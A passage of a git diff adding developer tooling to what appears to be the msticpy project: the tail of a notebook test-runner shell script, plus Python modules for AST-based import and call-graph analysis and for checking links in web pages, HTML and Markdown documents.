+    retVal=$?
+    if [ $retVal -ne 0 ]; then
+        echo Error encountered running notebook $NB
+        failures=$( expr $failures + 1 )
+    fi
+    success=$( expr $success + 1 )
+done
+
+if [ $failures -ne 0 ] || [ $success -eq 0 ]; then
+    echo $h_rule
+    echo $warn_l
+    echo $failures errors encountered running notebooks
+    echo $success successful executions running notebooks
+    echo $warn_l
+    popd > /dev/null
+    echo Completed with errors
+    date
+    exit 1
+fi
+
+
+echo $h_rule
+echo $h_rule
+echo All notebooks ran successfully.
+echo $h_rule
+echo $h_rule
+
+echo ""
+echo $h_rule
+echo Cleaning up...
+echo removing notebook output files
+rm *.nbconvert.ipynb
+popd > /dev/null
+
+
+deactivate
+echo ""
+echo "Remove the $env_name environment? (y/n)"
+read response
+if [ $response == y ]; then
+    rm -r $env_path
+fi
+
+echo $h_rule
+echo Test completed successfully.
+date
+echo $h_rule
+
diff --git a/tools/toollib/__init__.py b/tools/toollib/__init__.py
new file mode 100644
index 000000000..0b98b9eab
--- /dev/null
+++ b/tools/toollib/__init__.py
@@ -0,0 +1,23 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Tools lib init."""
+import re
+from pathlib import Path
+
+# pylint: disable=invalid-name
+VER_PATH = "../msticpy/_version.py"
+
+for check_path in Path(__file__).absolute().parents:
+    if check_path.joinpath(VER_PATH).is_file():
+        ver_text = check_path.joinpath(VER_PATH).read_text()
+        break
+else:
+    ver_text = ""
+
+v_match = re.search(r'^VERSION\s*=\s*[\'"]([^\'"]*)[\'"]', ver_text, re.MULTILINE)
+__version__ = v_match.group(1) if v_match else "no version"
+
+VERSION = __version__
diff --git a/tools/toollib/ast_parser.py b/tools/toollib/ast_parser.py
new file mode 100644
index 000000000..8078812ed
--- /dev/null
+++ b/tools/toollib/ast_parser.py
@@ -0,0 +1,161 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""AST Parser for limited node types."""
+import ast
+from pprint import pprint
+from collections import defaultdict
+from typing import List, Dict, Any
+
+from . import VERSION
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+def analyze(
+    src_file: str, quiet: bool = True, node_types: List[str] = None
+) -> Dict[str, Any]:
+    """
+    Analyze AST of module using Analyser visitor class.
+
+    Parameters
+    ----------
+    src_file : [type]
+        Input file
+    quiet : bool, optional
+        Hide reported information, by default True
+    node_types : List[str], optional
+        The node types to be returned, by default None
+
+    Returns
+    -------
+    Dict[str, Any]
+        Dictionary of node results keyed by node type.
+
+    """
+    with open(src_file, "r") as source:
+        tree = ast.parse(source.read())
+
+    analyzer = Analyzer()
+    analyzer.visit(tree)
+    if not quiet:
+        analyzer.report(node_types=node_types)
+    if node_types:
+        return {
+            n_type: res
+            for n_type, res in analyzer.results.items()
+            if n_type in node_types
+        }
+    return analyzer.results
+
+
+# pylint: disable=invalid-name
+class Analyzer(ast.NodeVisitor):
+    """
+    Module AST visitor class - used by ast.parse.
+
+    Attributes
+    ----------
+    nodes : Dict[str, Any]
+        Dictionary of nodes in AST
+
+    """
+
+    def __init__(self):
+        """Instantiate Analyzer."""
+        self.supported_types = ["imports", "imports_from", "calls", "funcs"]
+        self.nodes: Dict[str, Any] = {}
+        self.nodes["imports"] = []
+        self.nodes["imports_from"] = defaultdict(list)
+        self.nodes["calls"] = defaultdict(list)
+        self.nodes["funcs"] = defaultdict(list)
+
+    def visit_Import(self, node: Any):  # noqa: N802
+        """
+        Collect import statements.
+
+        Parameters
+        ----------
+        node : Any
+            Visited node
+
+        """
+        for alias in node.names:
+            self.nodes["imports"].append(alias.name)
+        self.generic_visit(node)
+
+    def visit_ImportFrom(self, node: Any):  # noqa: N802
+        """
+        Collect import from statements.
+
+        Parameters
+        ----------
+        node : Any
+            Visited node
+
+        """
+        # print("import from:", node, dir(node))
+        for alias in node.names:
+            self.nodes["imports_from"][node.module].append(alias.name)
+        self.generic_visit(node)
+
+    def visit_Call(self, node: Any):  # noqa: N802
+        """
+        Collect call statements.
+
+        Parameters
+        ----------
+        node : Any
+            Visited node
+
+        """
+        if hasattr(node, "func") and hasattr(node.func, "id"):
+            self.nodes["calls"][node.func.id].append(node.lineno)
+        if hasattr(node, "func") and hasattr(node.func, "attr"):
+            self.nodes["calls"][node.func.attr].append(node.lineno)
+        self.generic_visit(node)
+
+    def visit_FunctionDef(self, node: Any):  # noqa: N802
+        """
+        Collect function statements.
+
+        Parameters
+        ----------
+        node : Any
+            Visited node
+
+        """
+        # import pdb; pdb.set_trace()
+        self.nodes["funcs"][node.name].append(node.lineno)
+        self.generic_visit(node)
+
+    def report(self, node_types: List[str] = None):
+        """
+        Print report of analysis.
+
+        Parameters
+        ----------
+        node_types : List[str], optional
+            Optional list of node types, by default None
+
+        """
+        for node_type, results in self.nodes.items():
+            if node_types is not None and node_type in node_types:
+                print(node_type)
+                pprint(results)
+
+    @property
+    def results(self) -> Dict[str, Any]:
+        """
+        Return dictionary of results.
+
+        Returns
+        -------
+        Dict[str, Any]
+            Dictionary of results keyed by node_type.
+
+        """
+        return self.nodes
diff --git a/tools/toollib/import_analyzer.py b/tools/toollib/import_analyzer.py
new file mode 100644
index 000000000..20a14b944
--- /dev/null
+++ b/tools/toollib/import_analyzer.py
@@ -0,0 +1,369 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Python file import analyzer."""
+import re
+import sys
+from importlib import import_module
+from pathlib import Path
+from typing import Dict, List, Optional, Set
+
+import networkx as nx
+
+from . import VERSION
+
+# pylint: disable=relative-beyond-top-level
+from .ast_parser import analyze
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+PKG_TOKENS = r"([^#=><\[]+)(?:\[[^\]]+\])?([~=><]+)(.+)"
+
+
+# pylint: disable=too-few-public-methods
+class ModuleImports:
+    """Container class for module analysis."""
+
+    def __init__(self):
+        """Initialize class."""
+        self.internal: Set[str] = set()
+        self.external: Set[str] = set()
+        self.standard: Set[str] = set()
+        self.setup_reqs: Set[str] = set()
+        self.missing_reqs: Set[str] = set()
+        self.unknown: Set[str] = set()
+
+
+_PKG_RENAME_NAME = {
+    "attr": "attrs",
+    "dns": "dnspython",
+    "pkg_resources": "setuptools",
+    "sklearn": "scikit-learn",
+    "yaml": "pyyaml",
+    "bs4": "beautifulsoup4",
+    "dateutil": "python-dateutil",
+    "splunklib": "splunk-sdk",
+    "sumologic": "sumologic-sdk",
+    "vt": "vt-py",
+    "vt_graph_api": "vt-graph-api",
+    "kqlmagic": "KqlmagicCustom",
+}
+
+
+def _get_setup_reqs(
+    package_root: str,
+    req_file="requirements.txt",
+    extras: Optional[List[str]] = None,
+    skip_setup=True,
+):
+    with open(Path(package_root).joinpath(req_file), "r", encoding="utf-8") as req_f:
+        req_list = req_f.readlines()
+
+    setup_pkgs = _extract_pkg_specs(req_list)
+    if not skip_setup and not extras:
+        try:
+            extras = get_extras_from_setup(extra="all")
+            extra_pkgs = _extract_pkg_specs(extras)
+            setup_pkgs = setup_pkgs | extra_pkgs
+        except ImportError:
+            print("Could not process modifed 'setup.py'")
+    setup_versions = {key[0].casefold(): key for key in setup_pkgs}
+    setup_reqs = {key[0].casefold(): key[0] for key in setup_pkgs}
+
+    # for packages that do not match top-level names
+    # add the mapping
+    # create a dictionary so that we can re-map some names
+    for src, tgt in _PKG_RENAME_NAME.items():
+        if tgt.casefold() in setup_reqs:
+            setup_reqs.pop(tgt.casefold())
+            setup_reqs[src] = tgt.casefold()
+    # Rename Azure packages replace "." with "-"
+    az_mgmt_reqs = {
+        pkg.replace("-", "."): pkg for pkg in setup_reqs if pkg.startswith("azure-")
+    }
+
+    for key, pkg in az_mgmt_reqs.items():
+        setup_reqs.pop(pkg)
+        setup_reqs[key] = pkg
+
+    return setup_reqs, setup_versions
+
+
+def get_extras_from_setup(
+    extra: str = "all",
+    include_base: bool = False,
+) -> List[str]:
+    """
+    Return list of extras from setup.py.
+
+    Parameters
+    ----------
+    extra : str, optiona
+        The name of the extra to return, by default "all"
+    include_base : bool, optional
+        If True include install_requires, by default False
+
+    Returns
+    -------
+    List[str]
+        List of package requirements.
+
+    """
+    setup_mod = import_module("setup")
+    extras = getattr(setup_mod, "EXTRAS").get(extra)
+    if include_base:
+        base_install = getattr(setup_mod, "INSTALL_REQUIRES")
+        extras.extend(
+            [req.strip() for req in base_install if not req.strip().startswith("#")]
+        )
+    return sorted(list(set(extras)), key=str.casefold)
+
+
+def _extract_pkg_specs(pkg_specs: List[str]):
+    return {
+        re.match(PKG_TOKENS, item).groups()  # type: ignore
+        for item in pkg_specs
+        if re.match(PKG_TOKENS, item) and not item.strip().startswith("#")
+    }
+
+
+def _get_pkg_from_path(pkg_file: str, pkg_root: str):
+    module = ""
+    py_file = Path(pkg_file)
+    rel_path = py_file.relative_to(pkg_root)
+
+    for p_elem in reversed(rel_path.parts):
+        if p_elem.endswith(".py"):
+            p_elem = p_elem.replace(".py", "")
+        module = p_elem + "." + module if module else p_elem
+        yield module
+
+
+# Adapted from code on stackoverflow (url split over 3 lines)
+# https://stackoverflow.com/questions/22195382/how-to-check-
+# if-a-module-library-package-is-part-of-the-python-standard-library
+# /25646050#25646050
+def _check_std_lib(modules):
+    external = set()
+    std_libs = set()
+    imp_errors = set()
+    paths = {p.casefold() for p in sys.path}
+    paths.update({str(Path(p).resolve()).casefold() for p in sys.path})
+    stdlib_paths = {
+        p
+        for p in paths
+        if p.startswith(sys.prefix.casefold()) and "site-packages" not in p
+    }
+    for mod_name in modules:
+        if mod_name not in sys.modules:
+            try:
+                import_module(mod_name)
+            except ImportError:
+                imp_errors.add(mod_name)
+                continue
+            except Exception as err:  # pylint: disable=broad-except
+                print(f"Unexpected exception importing {mod_name}")
+                print(err)
+                imp_errors.add(mod_name)
+                continue
+        module = sys.modules[mod_name]
+
+        stdlib_module = _check_stdlib_path(module, mod_name, stdlib_paths)
+        if stdlib_module:
+            std_libs.add(mod_name)
+            continue
+
+        parts = mod_name.split(".")
+        for i, part in enumerate(parts):
+            partial = ".".join(parts[:i] + [part])
+            if partial in external or partial in std_libs:
+                # already listed or exempted
+                break
+            if partial in sys.modules and sys.modules[partial]:
+                # if match, add as external import
+                external.add(mod_name)
+                break
+    return std_libs, external, imp_errors
+
+
+def _check_stdlib_path(module, mod_name, stdlib_paths):
+    if (
+        not module
+        or mod_name in sys.builtin_module_names
+        or not hasattr(module, "__file__")
+    ):
+        # an import sentinel, built-in module or not a real module, really
+        return mod_name
+    # Test the path
+    fname = module.__file__
+    if fname.endswith(("__init__.py", "__init__.pyc", "__init__.pyo")):
+        fname = Path(fname).parent
+
+    if "site-packages" in str(fname).casefold():
+        return None
+
+    # step up the module path
+    while Path(fname) != Path(fname).parent:
+        if str(fname).casefold() in stdlib_paths:
+            # stdlib path, skip
+            return mod_name
+        fname = Path(fname).parent
+    return None
+
+
+def _get_pkg_modules(pkg_root):
+    """Get the list of all modules from file paths."""
+    pkg_modules = set()
+    for py_file in pkg_root.glob("**/*.py"):
+        pkg_modules.update(list(_get_pkg_from_path(py_file, pkg_root)))
+        if py_file.name == "__init__.py":
+            pkg_modules.update(list(_get_pkg_from_path(py_file.parent, pkg_root)))
+    return pkg_modules
+
+
+def _match_pkg_to_reqs(imports, setup_reqs):
+    req_libs = set()
+    req_missing = set()
+    for imp in imports:
+        imp = imp.casefold()
+        if imp in setup_reqs:
+            req_libs.add(setup_reqs[imp])
+            continue
+        imp_parts = imp.split(".")
+        for i in range(1, len(imp_parts)):
+            imp_name = ".".join(imp_parts[:i])
+
+            if imp_name.casefold() in setup_reqs:
+                req_libs.add(setup_reqs[imp_name])
+                break
+        else:
+            req_missing.add(setup_reqs.get(imp, imp))
+    return req_libs, req_missing
+
+
+def analyze_imports(
+    package_root: str,
+    package_name: str,
+    req_file: str = "requirements.txt",
+    extras: Optional[List[str]] = None,
+    process_setup_py: bool = True,
+) -> Dict[str, ModuleImports]:
+    """
+    Analyze imports for package.
+
+    Parameters
+    ----------
+    package_root : str
+        The path containing the package and requirements.txt
+    package_name : str
+        The name of the package (subfolder name)
+    req_file : str, optional
+        Name of the requirements file,
+        by default "requirements.txt"
+    extras : List[str]
+        A list of extras not specified in requirements file.
+    process_setup_py : bool, optional
+        If True try to parse setup.py for extras.
+
+    Returns
+    -------
+    Dict[str, ModuleImports]
+        A dictionary of modules and imports
+
+    """
+    setup_reqs, _ = _get_setup_reqs(
+        package_root, req_file, extras, skip_setup=(not process_setup_py)
+    )
+    pkg_root = Path(package_root) / package_name
+    all_mod_imports: Dict[str, ModuleImports] = {}
+    pkg_modules = _get_pkg_modules(pkg_root)
+
+    pkg_py_files = list(pkg_root.glob("**/*.py"))
+    print(f"processing {len(pkg_py_files)} modules")
+    for py_file in pkg_py_files:
+        module_imports = _analyze_module_imports(py_file, pkg_modules, setup_reqs)
+        # add the external imports for the module
+        mod_name = ".".join(py_file.relative_to(pkg_root).parts)
+        all_mod_imports[mod_name] = module_imports
+
+    return all_mod_imports
+
+
+def _analyze_module_imports(py_file, pkg_modules, setup_reqs):
+    file_analysis = analyze(py_file)
+
+    # create a set of all imports
+    all_imports = {file.strip() for file in file_analysis["imports"] if file}
+    all_imports.update(
+        file.strip() for file in file_analysis["imports_from"].keys() if file
+    )
+
+    if None in all_imports:
+        all_imports.remove(None)  # type: ignore
+
+    module_imports = ModuleImports()
+    module_imports.internal = set(all_imports) & pkg_modules
+    # remove known modules from the current package
+    # to get the list of external imports
+    ext_imports = set(all_imports) - pkg_modules
+    (
+        module_imports.standard,
+        module_imports.external,
+        module_imports.unknown,
+    ) = _check_std_lib(ext_imports)
+
+    module_imports.setup_reqs, module_imports.missing_reqs = _match_pkg_to_reqs(
+        module_imports.external, setup_reqs
+    )
+    return module_imports
+
+
+def print_module_imports(modules: Dict[str, ModuleImports], imp_type="setup_reqs"):
+    """
+    Print module imports of type.
+
+    Parameters
+    ----------
+    modules : Dict[str, ModuleImports]
+        Dictionary of module imports
+    imp_type : str, optional
+        import type, by default "setup_reqs"
+
+    """
+    for py_mod_name, py_mod in modules.items():
+        print(py_mod_name, getattr(py_mod, imp_type))
+
+
+def build_import_graph(modules: Dict[str, ModuleImports]) -> nx.Graph:
+    """
+    Build Networkx graph of imports.
+
+    Parameters
+    ----------
+    modules : Dict[str, ModuleImports]
+        Dictionary of module imports
+
+    Returns
+    -------
+    nx.Graph
+        Networkx DiGraph
+
+    """
+    req_imports = {mod: attribs.setup_reqs for mod, attribs in modules.items()}
+    import_graph = nx.DiGraph()
+    for py_mod, mod_imps in req_imports.items():
+        for imp in mod_imps:
+            import_graph.add_node(py_mod, n_type="module", degree=len(mod_imps))
+            import_graph.add_node(imp, n_type="import")
+            import_graph.add_edge(py_mod, imp)
+
+    for node, attr in import_graph.nodes(data=True):
+        if attr["n_type"] == "import":
+            imp_nbrs = len(list(import_graph.predecessors(node)))
+            import_graph.add_node(node, n_type="import", degree=imp_nbrs)
+
+    return import_graph
diff --git a/tools/toollib/module_tree.py b/tools/toollib/module_tree.py
new file mode 100644
index 000000000..8b33c1558
--- /dev/null
+++ b/tools/toollib/module_tree.py
@@ -0,0 +1,170 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Python file import analyzer."""
+from typing import Dict, Any, Tuple
+
+import networkx as nx
+import matplotlib.pyplot as plt
+
+# try:
+#     from nxviz.plots import CircosPlot
+#     circos = True
+# except ImportError:
+#     circos = False
+
+from .ast_parser import analyze
+from . import VERSION
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+def analyze_calls(module: str, all_calls=False) -> nx.DiGraph:
+    """
+    Analyze and build call graph of simple module.
+
+    Parameters
+    ----------
+    module : str
+        Module path
+    all_calls : bool
+        Return graph of all calls, default is False
+
+    Returns
+    -------
+    nx.DiGraph
+        Directed graph of functions and call
+
+    """
+    file_analysis = analyze(module)
+
+    # create a set of all imports
+    return _create_call_graph(file_analysis["calls"], file_analysis["funcs"], all_calls)
+
+
+def _create_call_graph(
+    calls: Dict[str, Any], funcs: Dict[str, Any], all_calls=False
+) -> nx.MultiDiGraph:
+    # Calculate the span (line numbers) of each function
+    func_span = dict()
+    last_func = None
+    for lineno, name in sorted([(span[0], name) for name, span in funcs.items()]):
+        if last_func:
+            func_span[last_func] = [func_span[last_func][0], lineno - 1]
+
+        func_span[name] = [lineno, 9999]
+        last_func = name
+
+    # create graph and add funcs as nodes
+    call_graph = nx.MultiDiGraph()
+    call_graph.add_nodes_from(
+        [(name, {"start": span[0], "end": span[1]}) for name, span in func_span.items()]
+    )
+
+    # add edged to the calls from each function
+    for call_name, call_lines in calls.items():
+        if call_name in funcs:
+            _add_call_edge(call_graph, call_name, func_span, call_lines, "local")
+        elif all_calls:
+            _add_call_edge(call_graph, call_name, func_span, call_lines, "external")
+
+    for node in call_graph.nodes():
+        n_callers = len(list(call_graph.predecessors(node)))
+        color = "red" if not n_callers else "blue"
+        call_graph.add_node(node, color=color, degree=n_callers)
+
+    return call_graph
+
+
+def _add_call_edge(
+    call_graph: nx.DiGraph,
+    call_name: str,
+    func_span: Dict[str, Any],
+    call_lines,
+    call_type="local",
+):
+    call_graph.add_node(call_name, call_type=call_type)
+    for line in call_lines:
+        calling_func = [
+            func for func, span in func_span.items() if span[0] <= line <= span[1]
+        ]
+        if calling_func:
+            call_graph.add_edge(calling_func[0], call_name, line=line)
+        else:
+            call_graph.add_edge("ext", call_name, line=line)
+
+
+def _print_decendents(graph, par_node, indent=0):
+    for node in graph.successors(par_node):
+        edge_list = []
+        for p_node, t_node, attr in graph.edges([par_node, node], data=True):
+            if p_node == par_node and t_node == node:
+                edge_line = attr["line"]
+                edge_list.append((edge_line, par_node, node))
+        for e_line, p_node, t_node in sorted(edge_list, key=lambda k: k[0]):
+            print(" " * indent, f"+->({e_line}) {t_node}")
+            if p_node != t_node:
+                _print_decendents(graph, t_node, indent + 4)
+
+
+def plot_graph(call_graph: nx.Graph, size: Tuple[int, int] = (10, 10)):
+    """
+    Plot circular graph using matplotlib.
+
+    Parameters
+    ----------
+    call_graph : nx.Graph
+        The graph to plot.
+    size : Tuple[int, int]
+        size of plot, default is(10,10)
+
+    """
+    # if circos:
+    #     c = CircosPlot(
+    #         call_graph,
+    #         node_color='degree',
+    #         node_grouping='degree',
+    #         node_order="degree",
+    #         node_labels=True,
+    #         fontsize="large",
+    #         node_label_layout="rotation",
+    #         figsize=(20,20)
+    #     )
+    #     c.draw()
+    # else:
+    pos = nx.circular_layout(call_graph)
+    nx.draw_networkx(call_graph, pos=pos)
+    plt.gcf().set_size_inches(size)
+    plt.show()
+
+
+def print_call_tree(call_graph: nx.Graph, level="top"):
+    """
+    Print out the call tree.
+
+    Parameters
+    ----------
+    call_graph : [type]
+        [description]
+    level : str, optional
+        [description], by default "top"
+
+    """
+    for node in call_graph.nodes():
+        if level == "top":
+            if call_graph.in_degree(node) == 0:
+                print(
+                    f"\n{node} [{call_graph.nodes()[node]['start']}",
+                    f"- {call_graph.nodes()[node]['end']}]",
+                )
+                print("-" * len(str(node)))
+                _print_decendents(call_graph, node, indent=0)
+        elif "start" in call_graph.nodes()[node]:
+            print(
+                f"\n{node} [{call_graph.nodes()[node]['start']}-{call_graph.nodes()[node]['end']}]"
+            )
+            print("-" * len(str(node)))
+            _print_decendents(call_graph, node, indent=0)
diff --git a/tools/toollib/url_checker.py b/tools/toollib/url_checker.py
new file mode 100644
index 000000000..53a6f45de
--- /dev/null
+++ b/tools/toollib/url_checker.py
@@ -0,0 +1,402 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Python file import analyzer."""
+from collections import defaultdict, namedtuple
+from pathlib import Path
+from typing import Dict, Set, Tuple, Optional, List
+from urllib import parse
+
+import markdown
+import httpx
+from bs4 import BeautifulSoup
+
+# pylint: disable=relative-beyond-top-level
+from . import VERSION
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+UrlResult = namedtuple("UrlResult", "status, history, url, message")
+
+
+# pylint: disable=broad-except
+def check_url(url: str) -> UrlResult:
+    """
+    Connect to URL and return response status.
+
+    Parameters
+    ----------
+    url : str
+        URL to check
+
+    Returns
+    -------
+    UrlResult
+        Tuple of status code, redirect history, requested url,
+        status/error message.
+
+    """
+    try:
+        resp = httpx.get(url)
+        report = str(resp.status_code)
+        if resp.history:
+            history_status_codes = [str(h.status_code) for h in resp.history]
+            report += " [HISTORY: " + ", ".join(history_status_codes) + "]"
+            result = UrlResult(
+                resp.status_code, resp.history, url, "No error. Redirect to " + resp.url
+            )
+        elif resp.status_code == 200:
+            result = UrlResult(
+                resp.status_code, resp.history, url, "No error. No redirect."
+            )
+        else:
+            result = UrlResult(resp.status_code, resp.history, url, "Error?")
+    except Exception as err:
+        result = UrlResult(0, [], url, err)
+    return result
+
+
+# pylint: enable=broad-except
+
+
+PAGES_TO_SKIP = [
+    "readthedocs.io/en/latest/genindex.html",
+    "readthedocs.io/en/latest/_images/",
+]
+
+
+# pylint: disable=too-many-locals, too-many-branches
+def check_site(  # noqa: MC0001
+    page_url: str,
+    all_links: bool = False,
+    top_root: Optional[str] = None,
+    checked_links: Dict[str, UrlResult] = None,
+    visited_pages: Dict[str, Set[str]] = None,
+) -> Tuple[Dict[str, UrlResult], Dict[str, Set[str]]]:
+    """
+    Recursively check URL page and child links.
+
+    Parameters
+    ----------
+    page_url : str
+        Url to check
+    all_links : bool, optional
+        Check all links, by default False - only check
+        links to external locations
+    top_root : Optional[str], optional
+        Top level URL, by default None - page_url is taken
+        as the top level URL.
+    checked_links : Dict[str, UrlResult], optional
+        Dictionary of links checked, by default None.
+        This is used in recursive calls to child pages, not usually
+        specified in initial call.
+    visited_pages : Dict[str, Set[str]], optional
+        Dictionary of pages visited, by default None.
+        This is used in recursive calls to child pages, not usually
+        specified in initial call.
+
+    Returns
+    -------
+    Tuple[Dict[str, UrlResult], Dict[str, Set[str]]]
+        Tuple of:
+        1. Dictionary of checked links
+        2. Dictionary of visited pages (url, set of referring pages)
+
+    """
+    if visited_pages is None:
+        visited_pages = defaultdict(set)
+    if checked_links is None:
+        checked_links = {}
+    if not top_root:
+        top_root, _ = parse.urldefrag(page_url)
+        if not top_root:
+            return {}, {}
+
+    print(f"\nPage: {page_url}")
+    skip_pages = [pat for pat in PAGES_TO_SKIP if pat in page_url]
+    if skip_pages:
+        return {}, {}
+    if page_url in visited_pages:
+        print("already visited")
+        return {}, {}
+
+    resp = httpx.get(page_url)
+    if resp.headers["Content-Type"] != "text/html":
+        print(resp.headers["Content-Type"])
+        return {}, {}
+    html = resp.content
+
+    soup = BeautifulSoup(html, "html.parser")
+    links = soup.find_all("a")
+
+    page_links = {link.get("href") for link in links}
+    print(
+        f"visited_pages = {len(visited_pages)}",
+        f"visited_links = {len(checked_links)}",
+        f"{len(page_links)} links in current page",
+    )
+    for url_link in page_links:
+        result, skip_next = _check_single_link(
+            url_link, all_links, checked_links, page_url, top_root
+        )
+        if skip_next:
+            continue
+        if result:
+            checked_links[url_link] = result
+        if top_root.lower() in url_link.lower():
+            # Intra site link - we may need to follow that
+            child_page, _ = parse.urldefrag(url_link)
+            if child_page not in visited_pages:
+                child_results, _ = check_site(
+                    page_url=child_page,
+                    all_links=all_links,
+                    top_root=top_root,
+                    visited_pages=visited_pages,
+                    checked_links=checked_links,
+                )
+                # record a reference from the parent page
+                visited_pages[child_page].add(page_url)
+                checked_links = {**checked_links, **child_results}
+            else:
+                print("v", end="")
+    return (checked_links, visited_pages)
+
+
+# pylint: enable=too-many-locals, too-many-branches
+
+
+def _check_single_link(
+    url_link: str,
+    all_links: bool,
+    checked_links: Dict[str, UrlResult],
+    page_url: str,
+    top_root: str,
+) -> Tuple[Optional[UrlResult], bool]:
+    result = None
+    if url_link[0:4] == "http":
+        if url_link in checked_links:
+            print("_", end="")
+            return result, True
+        if all_links or (top_root.lower() not in url_link.lower()):
+            print("u", end="")
+            result = check_url(url_link)
+    else:
+        if url_link.startswith("#"):
+            # don't check fragments
+            print("#", end="")
+            return result, True
+        url_link = parse.urljoin(page_url, url_link)
+        if url_link in checked_links:
+            print("_", end="")
+            return result, True
+        if all_links:
+            print("r", end="")
+            result = check_url(url_link)
+    return result, False
+
+
+def check_html_doc(
+    html_path: str,
+    all_links: bool = False,
+    top_root: str = None,
+    checked_links: Dict[str, UrlResult] = None,
+) -> Dict[str, UrlResult]:
+    """
+    Check links in an html document (file).
+
+    Parameters
+    ----------
+    html_path : str
+        Path to the file
+    all_links : bool, optional
+        Check all links, by default False - only check
+        links to external locations
+    top_root : Optional[str], optional
+        Top level URL, by default None - page_url is taken
+        as the top level URL.
+    checked_links : Dict[str, UrlResult], optional
+        Dictionary of links checked, by default None.
+        This is used in recursive calls to child pages, not usually
+        specified in initial call.
+
+    Returns
+    -------
+    Dict[str, UrlResult]
+        Dictionary of checked links from this file
+
+    """
+    if checked_links is None:
+        checked_links = {}
+    result_links: Dict[str, UrlResult] = {}
+
+    print(f"\nPage: {html_path}")
+    with open(html_path, "rb") as html_file:
+        html = html_file.read()
+    soup = BeautifulSoup(html, "html.parser")
+    links = soup.find_all("a")
+
+    page_links = {link.get("href") for link in links}
+    print(
+        f"visited_links = {len(checked_links)}",
+        f"{len(page_links)} links in current page",
+    )
+    for url_link in page_links:
+        result = None
+        if url_link[0:4] == "http":
+            if url_link in checked_links:
+                print("_", end="")
+                continue
+            if all_links or not top_root or (top_root.lower() not in url_link.lower()):
+                print("u", end="")
+                result = check_url(url_link)
+        if result:
+            result_links[url_link] = result
+    return result_links
+
+
+def check_md_document(doc_path: str) -> Dict[str, UrlResult]:
+    """
+    Check links in Markdown document.
+
+    Parameters
+    ----------
+    doc_path : str
+        Path to the document
+
+    Returns
+    -------
+    Dict[str, UrlResult]
+        Dictionary of checked links
+
+    """
+    with open(doc_path, "r") as doc_file:
+        body_markdown = doc_file.read()
+    md_content = markdown.markdown(body_markdown)
+    soup = BeautifulSoup(md_content, "html.parser")
+    links = soup.find_all("a")
+
+    page_links = {link.get("href") for link in links}
+
+    checked_links: Dict[str, UrlResult] = {}
+    print("Checking page...")
+    for url_link in page_links:
+        if url_link[0:4] == "http":
+            if url_link in checked_links:
+                print("_", end="")
+                continue
+            print("a", end="")
+            result = check_url(url_link)
+            checked_links[url_link] = result
+        else:
+            print("_", end="")
+    print(
+        f"visited_links = {len(checked_links)}",
+        f"{len(page_links)} links in current page",
+    )
+    _print_url_results(list(checked_links.values()))
+    return checked_links
+
+
+def _print_url_results(results: List[UrlResult]):
+    """
+    Print results of any URLs that did not return 200 status.
+
+    Parameters
+    ----------
+    results : List[UrlResult]
+        List of URLs checks to print.
+
+    """
+    # Sort by status and then by history length
+    results.sort(key=lambda result: (result.status, len(result.history)))
+
+    print("\n\nResults")
+    print("=========")
+    # 301s - may want to clean up 301s if you have multiple redirects
+    print("Redirect 301s")
+    i = 0
+    for result in results:
+        if result.history:
+            i += 1
+            print(i, end=". ")
+            for response in result.history:
+                print(">>", response.url, end="\n\t")
+            print(">>>>", result[3])
+
+    # non-200s
+    print("\n==========\nERRORS")
+    for result in results:
+        if result.status != 200:
+            print(result.status, "-", result.url)
+
+
+def check_site_links(
+    start_url: str, all_links: bool = False
+) -> Tuple[Dict[str, UrlResult], Dict[str, Set[str]]]:
+    """
+    Check a URL and child pages for broken links.
+
+    Parameters
+    ----------
+    start_url : [type]
+        Starting URL
+    all_links : bool, optional
+        Check all links, by default False - only check
+        links to external locations
+
+    Returns
+    -------
+    Tuple[Dict[str, UrlResult], Dict[str, Set[str]]]
+        Tuple of:
+        1. Dictionary of checked links
+        2. Dictionary of visited pages (url, set of referring pages)
+
+    """
+    print(
+        "Checks: u = full url, # = fragment (skipped)",
+        "r = relative linkv = child page",
+        "_ = skipped (duplicate)",
+    )
+    checked_links, visits = check_site(start_url, all_links=all_links)
+    _print_url_results(list(checked_links.values()))
+    return checked_links, visits
+
+
+def check_html_docs(
+    doc_path: str, recurse: bool = True
+) -> Dict[str, Dict[str, UrlResult]]:
+    """
+    Check multiple HTML files in `doc_path`.
+
+    Parameters
+    ----------
+    doc_path : str
+        Path
+    recurse: bool
+        If True, recurse subfolders, default is True
+
+    Returns
+    -------
+    Dict[str, Dict[str, UrlResult]]
+        Dictionary of pages checked. Results for each page
+        is a dictionary of checked links for the page.
+
+    """
+    if recurse:
+        glob_pattern = "**/*.html"
+    else:
+        glob_pattern = "*.html"
+    html_files = list(Path(doc_path).glob(glob_pattern))
+    checked_pages: Dict[str, Dict[str, UrlResult]] = {}
+    checked_links: Dict[str, UrlResult] = {}
+    for html_file in html_files:
+        pg_links = check_html_doc(str(html_file), checked_links=checked_links)
+        checked_links = {**checked_links, **pg_links}
+        page = str(html_file.relative_to(Path(doc_path)))
+        checked_pages[page] = pg_links
+    _print_url_results(list(checked_links.values()))
+    return checked_pages
diff --git a/tools/toollib/url_checker_async.py b/tools/toollib/url_checker_async.py
new file mode 100644
index 000000000..b87823dd9
--- /dev/null
+++ b/tools/toollib/url_checker_async.py
@@ -0,0 +1,256 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
